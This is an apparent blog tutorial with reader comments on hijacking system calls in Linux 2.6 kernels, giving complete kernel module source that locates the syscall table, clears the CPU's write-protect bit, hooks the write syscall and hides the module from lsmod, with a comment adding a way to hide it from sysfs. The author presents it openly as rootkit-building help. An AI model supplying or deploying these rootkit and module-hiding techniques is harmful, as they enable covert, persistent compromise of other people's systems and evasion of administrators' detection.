Syscall Hijacking: Kernel 2.6.* systems

In this guide I will explain how to hijack a syscall in the 2.6.* kernels: in particular, how to bypass the kernel’s write protection of the syscall table and how to deal with the write-protect (WP) bit of the CPU’s CR0 register.
I won’t explain what a syscall or the syscall table is: I assume you already know.

– Accessing the Syscall Table

If you have tried to run a rootkit written for 2.4.* kernels, you will know that it doesn’t work on 2.6.* systems.
In kernel 2.6.* the “sys_call_table” symbol is no longer exported, so a module can’t reference it directly; moreover, the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:

extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer

But the table is still in memory: if we know its address, we can access it through a simple pointer. There are several ways to find this address: the simplest is to search the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled and lists the kernel’s symbols together with their addresses.
An excerpt of this file follows:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic
...
c018d140 t cgroup_remount
c018d260 T cgroup_path
c018d310 t allocate_cg_links
c018d410 t find_css_set
c018d7d0 T cgroup_attach_task
c018da40 T cgroup_clone
c018dcc0 t cgroup_tasks_write
c018dd90 t cgroup_release_agent
c018df50 t proc_cgroup_show
c018e180 t cgroup_pidlist_find
c018e320 t cgroup_write_event_control
c018e610 t pidlist_allocate
c018e640 t pidlist_array_load
...

We are only interested in the “sys_call_table” address:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table
c05d2180 R sys_call_table
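
The same lookup can be done programmatically. The following is a minimal user-space sketch, assuming the usual “address type name” layout shown above; the function name “lookup_symbol” is hypothetical and not part of any kernel or libc API.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Look up `symbol` in a stream of System.map-style lines
 * ("<hex address> <type letter> <name>").
 * On success, store the address in *addr and the type letter in *type
 * and return 0. Return -1 if the symbol is not found.
 */
int lookup_symbol(FILE *map, const char *symbol,
                  unsigned long long *addr, char *type)
{
    char line[256];
    char name[128];
    unsigned long long a;
    char t;

    assert(map != NULL && symbol != NULL && addr != NULL && type != NULL);

    while (fgets(line, sizeof line, map) != NULL) {
        /* Skip lines that do not have the three expected fields. */
        if (sscanf(line, "%llx %c %127s", &a, &t, name) != 3)
            continue;
        /* Exact comparison: a substring match would also hit other names. */
        if (strcmp(name, symbol) == 0) {
            *addr = a;
            *type = t;
            return 0;
        }
    }
    return -1;
}
```

A caller would open the System.map file with “fopen()” and pass the stream together with the name “sys_call_table”. Unlike the “grep” above, the comparison is exact, so symbols whose names merely contain the string are not returned.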

– Bypass Kernel Write Protection

Now we have the table’s address. But if you look at the output of the “grep” command you will see an ‘R’ next to it: this means that the symbol lives in a read-only data section.
Indeed, the kernel places some structures in read-only memory: in this way it protects them against intentional or unintentional changes that could make the system unstable. So we have to make the pages that hold the table writable if we want to modify it.
Fortunately, the kernel provides us with special functions for this task:

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

The “pages_rw” function makes the given pages writable; “pages_ro” makes them read-only again. Both take a “struct page” pointer rather than a virtual address, so we first use “virt_to_page()”, which returns the “struct page” describing the physical page that backs a given kernel virtual address. In order to call the “pages_*” functions we have to know their addresses; they appear in the “System.map” file as “set_pages_rw” and “set_pages_ro”:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro
c012fbb0 T set_pages_rw
c012fe80 T set_pages_ro
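
The idea of switching a page between read-only and read/write can be tried safely in user space. The sketch below is only an analogy, not kernel code: it uses the POSIX “mmap()” and “mprotect()” calls on an anonymous page owned by the process, and the function name “poke_protected_page” is hypothetical.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map one anonymous page read-only, make it writable, store `value` in
 * it, restore the read-only protection and read the value back.
 * Returns the value read, or -1 on any failure.
 */
int poke_protected_page(int value)
{
    long page_size = sysconf(_SC_PAGESIZE);
    int *page;
    int result;

    assert(value >= 0);  /* -1 is reserved for errors */
    if (page_size <= 0)
        return -1;

    page = mmap(NULL, (size_t)page_size, PROT_READ,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;

    /* User-space counterpart of pages_rw(): allow writes to the page. */
    if (mprotect(page, (size_t)page_size, PROT_READ | PROT_WRITE) != 0) {
        munmap(page, (size_t)page_size);
        return -1;
    }
    page[0] = value;

    /* User-space counterpart of pages_ro(): read-only again. */
    if (mprotect(page, (size_t)page_size, PROT_READ) != 0) {
        munmap(page, (size_t)page_size);
        return -1;
    }

    result = page[0];  /* reading is still allowed */
    munmap(page, (size_t)page_size);
    return result;
}
```

Writing to the page before the first “mprotect()” call would end the process with a segmentation fault, which is the user-space equivalent of the fault the kernel raises when a module writes to a read-only page.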

Now we can access and modify the sys_call_table in this way:

...

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

...

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

...

static int init(void)
{

    struct page *_sys_call_page;
    printk(KERN_ALERT "\nHIJACK INIT\n");

    /* pass the table's address, not the address of our pointer variable */
    _sys_call_page = virt_to_page(syscall_table);

    pages_rw(_sys_call_page, 1);
    
    // now we can use the sys_call_table
    
    ...
}    

This is an example source code (hijack.c):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED\n");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    struct page *sys_call_page_temp;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    /* pass the table's address, not the address of our pointer variable */
    sys_call_page_temp = virt_to_page(syscall_table);
    pages_rw(sys_call_page_temp, 1);

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;

    return 0;
}

static void exit(void) {

    struct page *sys_call_page_temp;
   
    sys_call_page_temp = virt_to_page(syscall_table);
    syscall_table[__NR_write] = (unsigned long)original_write;
    pages_ro(sys_call_page_temp, 1);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Here is a “Makefile” to compile the source code:

obj-m	:= hijack.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko

– Bypass CR0 Protection

x86 CPUs have a WP (write protect) bit in the CR0 control register: it is bit 16, not to be confused with bit 0 (PE), which enables “protected mode” and was introduced with the Intel 80286. When WP is set, the CPU refuses writes to read-only pages even from kernel code. We can check whether our CPU supports this kind of protection in this way:

spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp
wp		: yes
wp		: yes

Wikipedia’s article on control registers has a brief description of CR0: bit 16 (WP) is the one that deals with write protection. If WP is set to 1, the CPU is in “write-protect” mode and honours read-only pages even in kernel mode; if it is 0, kernel code can write to any mapped page.
If the CPU is in “write-protect” mode and our module writes to a page of the syscall table that is still read-only, the write faults and the “insmod” process is killed:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
Killed

So if we set this bit to 0 we can write to every mapped memory page, including those that hold the syscall table.
Again, the kernel provides us with two macros:

#define read_cr0() (native_read_cr0())
#define write_cr0(x) (native_write_cr0(x))

The native read/write functions are defined as follows:

static inline unsigned long native_read_cr0 (void)
{
         unsigned long val;
         asm volatile("movl %%cr0,%0\n\t" :"=r" (val));
         return val;
}

static inline void native_write_cr0 (unsigned long val)
{
         asm volatile("movl %0,%%cr0": :"r" (val));
}

The “read_cr0” function returns the value of the CR0 register; the “write_cr0” function loads the register with the value passed as its parameter.
Now we can disable and re-enable write protection in this way:

/* disable write protection

   I apply a NOT to 0x10000 (bit 16), which gives 0xFFFEFFFF on a
   32-bit system: every bit is 1 except bit 16. Then I AND this mask
   with the current value of the CR0 register. So the WP bit is set
   to 0, all the other bits are left untouched, and write protection
   is disabled.

*/

write_cr0 (read_cr0 () & (~ 0x10000));

/* enable write protection

   I OR the current value of the CR0 register with 0x10000.
   So the WP bit is set to 1, all the other bits are left
   untouched, and write protection is enabled again.

*/

write_cr0 (read_cr0 () | 0x10000);
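
The bit arithmetic can be checked in user space on plain integers, without touching the real register. This is a small sketch under that assumption; the names “CR0_WP_MASK”, “cr0_clear_wp”, “cr0_set_wp” and “cr0_wp_is_set” are hypothetical helpers introduced here for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define CR0_WP_MASK UINT32_C(0x10000)  /* bit 16 of CR0 */

/* The inverted mask has every bit set except bit 16. */
static_assert((uint32_t)~CR0_WP_MASK == UINT32_C(0xFFFEFFFF),
              "NOT of 0x10000 is 0xFFFEFFFF on 32 bits");

/* Return `cr0` with the WP bit cleared; all other bits are unchanged. */
uint32_t cr0_clear_wp(uint32_t cr0)
{
    return cr0 & ~CR0_WP_MASK;
}

/* Return `cr0` with the WP bit set; all other bits are unchanged. */
uint32_t cr0_set_wp(uint32_t cr0)
{
    return cr0 | CR0_WP_MASK;
}

/* Return 1 if the WP bit is set in `cr0`, 0 otherwise. */
int cr0_wp_is_set(uint32_t cr0)
{
    return (cr0 & CR0_WP_MASK) != 0;
}
```

For example, clearing WP in the value 0x80050033 gives 0x80040033, and setting it again restores 0x80050033: only bit 16 changes.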

The modified “hijack.c” (“hijack2.c”) follows:

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED\n");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0 (read_cr0 () & (~ 0x10000));

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = (unsigned long)new_write;

    write_cr0 (read_cr0 () | 0x10000);

    return 0;
}

static void exit(void) {

    write_cr0 (read_cr0 () & (~ 0x10000));

    syscall_table[__NR_write] = (unsigned long)original_write;

    write_cr0 (read_cr0 () | 0x10000);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Makefile:

obj-m	:= hijack2.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module without problems:

spaccio@spaccio-laptop:~$ sudo insmod hijack2.ko
spaccio@spaccio-laptop:~$ 

– Hide Kernel Module

We can easily hide our module by removing it from the module list, which is what “lsmod” and “/proc/modules” show. Look at the following source code (“hijack3.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>


static int init(void) {

    list_del_init(&__this_module.list);

    return 0;
}

static void exit(void) {

    return;
}

module_init(init);
module_exit(exit);

We compile it with this “Makefile”:

obj-m	:= hijack3.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

After loading it, “lsmod” no longer shows our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack3.ko
spaccio@spaccio-laptop:~$ lsmod
Module                  Size  Used by
kernel_redir            2200  1 
aes_i586                7280  2 
aes_generic            26875  1 aes_i586
rfcomm                 33811  6 
binfmt_misc             6599  1 
sco                     7998  2 
bnep                    9542  2 
l2cap                  37008  16 rfcomm,bnep
vboxnetadp              6454  0 
vboxnetflt             15216  0 
...
spaccio@spaccio-laptop:~$ lsmod | grep hijack3
spaccio@spaccio-laptop:~$

This happens thanks to the “list_del_init()” function, which is defined as follows:

static inline void list_del_init (struct list_head * entry)
{
	 __list_del (entry->prev, entry->next);
	 INIT_LIST_HEAD (entry);
}

While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:

static inline void __list_del (struct list_head * prev, struct list_head * next)
{
	 next-> prev = prev;
	 prev-> next = next;
}

static inline void INIT_LIST_HEAD (struct list_head * list)
{
	 list-> next = list;
	 list-> prev = list;
}

So the “list_del_init()” function unlinks our module’s entry from the doubly linked list that the kernel uses to keep track of loaded modules: in this way the module can no longer be found by lsmod (or in /proc/modules).
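
The effect of the unlink can be reproduced in user space. The sketch below re-implements the list helpers in plain C, mirroring the kernel definitions quoted above; “list_add_tail”, “list_count” and “list_contains” are written here for the demonstration and are assumptions about how one might test it, not code taken from the module.

```c
#include <assert.h>
#include <stddef.h>

struct list_head {
    struct list_head *next, *prev;
};

/* Make `list` an empty circular list that points to itself. */
void INIT_LIST_HEAD(struct list_head *list)
{
    list->next = list;
    list->prev = list;
}

/* Insert `entry` just before `head`, i.e. at the tail of the list. */
void list_add_tail(struct list_head *entry, struct list_head *head)
{
    entry->prev = head->prev;
    entry->next = head;
    head->prev->next = entry;
    head->prev = entry;
}

/* Unlink `entry` from its list and leave it pointing to itself. */
void list_del_init(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    INIT_LIST_HEAD(entry);
}

/* Count the entries reachable from `head` (the head itself excluded). */
size_t list_count(const struct list_head *head)
{
    const struct list_head *pos;
    size_t n = 0;

    assert(head != NULL);
    for (pos = head->next; pos != head; pos = pos->next)
        n++;
    return n;
}

/* Return 1 if `entry` is reachable by walking the list from `head`. */
int list_contains(const struct list_head *head, const struct list_head *entry)
{
    const struct list_head *pos;

    assert(head != NULL);
    for (pos = head->next; pos != head; pos = pos->next)
        if (pos == entry)
            return 1;
    return 0;
}
```

After “list_del_init()” is called on an entry, a walk that starts from the list head never reaches it, even though the entry itself still exists in memory. This is the same reason a tool that walks the module list stops reporting the module.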

– Conclusion

The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).
Bye.

  1. December 3, 2010 at 21:56

    great work mate :)

  2. December 8, 2010 at 16:16

    great work, is very nice topic

  3. December 13, 2010 at 20:26

    hi,
    when i try doing this trick on my box, thereis a few questions in my dumb brain:
    – why u are using 0x10000 value when try to enable/disable cr0 on protected mode?
    – if only ‘disable cr0 wp’ trick can bypass protection of at all.
    why still need to disable page protection by ‘pages_rw((virt_to_pages…. ‘?

    • December 13, 2010 at 23:10

      Hi Vjick, I have modified the post after your comment:
      – now you can read the answer from the post;
      – we don’t still need to disable the page protection with ‘pages_rw((virt_to_pages…. ‘: I have made a mistake in “cut & paste”.
      Bye bye.

      • Vjick Nzr
        December 16, 2010 at 13:09

        thanks for your reply, styx^..
        btw, i can understand how the logic of AND,OR,and negation(~) in manipulating cpu register.
        but im still confuse, why that 5th bit[(0x00010000) -cmiiw-] from the register value must be 1, while PE flags is in bit 0 and WP flags is in bit 16 (according to http://en.wikipedia.org/wiki/Control_register#CR0).

        how can that happen? ;p

  4. December 16, 2010 at 13:17

    or maybe in overall, why the value must be [0x01111 / 0x10000] not [0x01111111 / 0x10000000] like in the common bit x86 cpu register to perform enable/disable PE?

    thanks you, just confusing question in my humble-dumble head..

    • December 16, 2010 at 15:18

      Hi Vjick:

      – 0x10000 (hexadecimal) stands for 000…010000000000000000 (binary)
      – ~(0x10000) stands for 111…1101111111111111111

      As you can see the 17th bit (WP) is set to 0. So you can write in the memory pages previously in read-only mode.

      Bye bye.

      • December 16, 2010 at 18:27

        yeah.. my fault, i jst wrong while convert(negationing) value in hex, not binary.
        thanks you, styx.

  5. sj
    December 17, 2010 at 17:50

    Instead of using hardcoded addresses you could parse memory beetween 0xc0000000 and 0xd0000000 (x86) and check for syscall table.

    • January 18, 2011 at 13:36

      You are right. Soon I’ll write a post about it.
      Thank you for the hint.

  6. Raingarden9
    December 31, 2010 at 02:02

    Nice post.

    On a side note Centos5.5 (probably other RH based distros?) does not provide pages_rw() and pages_ro() functions.

    • January 18, 2011 at 13:39

      I don’t know how the Centos5.5 kernel works.
      If you have tested my codes and they don’t work then you could/should be right :-).

  7. eeknay
    February 21, 2011 at 22:41

    Absolutely awesome writeup!!!

  8. Igor
    March 6, 2011 at 22:45

    Will/can this method be used for hijacking kernel functions (not syscalls) given their address from System.map? If so, can you point me how to replace a function call with given address and parameter list?

    • March 7, 2011 at 00:52

      Yes, you can do that, but I’ve never tried it. I think that the steps are the same of the syscall hijacking.
      Bye.

  9. Chameleon
    March 7, 2011 at 05:05

    Great writeup.
    One question, can this method be done on a 64 bit machine.
    pages_rw
    pages_ro
    Doesn’t exist in the System.map. What would be the equiv?

    • March 7, 2011 at 12:36

      I don’t know the answer because I don’t have a 64 bit machine. Have you searched for set_memory_rw() and set_memory_ro() functions?
      Bye.

      • Igor
        March 7, 2011 at 15:19

        I run 64-bit too.. have the following page/memory functions for 2.6.36:
        ffffffff8102f1f0 T set_pages_rw
        ffffffff8102ebe0 T set_memory_rw
        ffffffff81a7c6b0 r __ksymtab_set_memory_rw
        ffffffff81a8bdf8 r __kcrctab_set_memory_rw
        ffffffff81a909e8 r __kstrtab_set_memory_rw
        .
        ffffffff8102f1b0 T set_pages_ro
        ffffffff8102ebb0 T set_memory_ro
        ffffffff81a7c6c0 r __ksymtab_set_memory_ro
        ffffffff81a8be00 r __kcrctab_set_memory_ro
        ffffffff81a909f6 r __kstrtab_set_memory_ro

        Which one is correct to use? set_pages_xx or set_memory_xx?

      • March 7, 2011 at 17:57

        You have to use set_pages_xx as you can read in the post.
        These functions are defined in “arch/x86/mm/pageattr.c”:

        int set_pages_ro(struct page *page, int numpages)
        {
        unsigned long addr = (unsigned long)page_address(page);

        return set_memory_ro(addr, numpages);
        }

        int set_pages_rw(struct page *page, int numpages)
        {
        unsigned long addr = (unsigned long)page_address(page);

        return set_memory_rw(addr, numpages);
        }

        As you can see they call the set_memory_xx functions.
        Bye.

  10. Igor
    March 7, 2011 at 18:18

    It seems that including <asm/system.h> provides native read_cr0 && write_cr0 calls, that was enough to replace some function’s call with my own, without using set_memory/set_page family. However, for some reason I suppose that replaced function didn’t receive the passed variables.. cheers.

    • Igor
      March 7, 2011 at 18:54

      Fixed: <asm/system.h>

  11. fdb
    March 15, 2011 at 01:50

    Modules are not hidden in sysfs

    • amg
      June 11, 2012 at 05:57

      you can use :

      kobject_del(__this_module.holders_dir->parent);

  12. N. A. Joshi
    August 21, 2011 at 17:37

    Dear Blog-Author,
    What a beautiful article this is! The way you have poured the concept is inspirative.
    I liked this page, and the content remained helpful to me. I am thankful to you.

    Thanks.
    N. A. Joshi

  13. ph-n00b
    May 12, 2012 at 22:56

    thanks for sharing very much appreciated – mabuhay
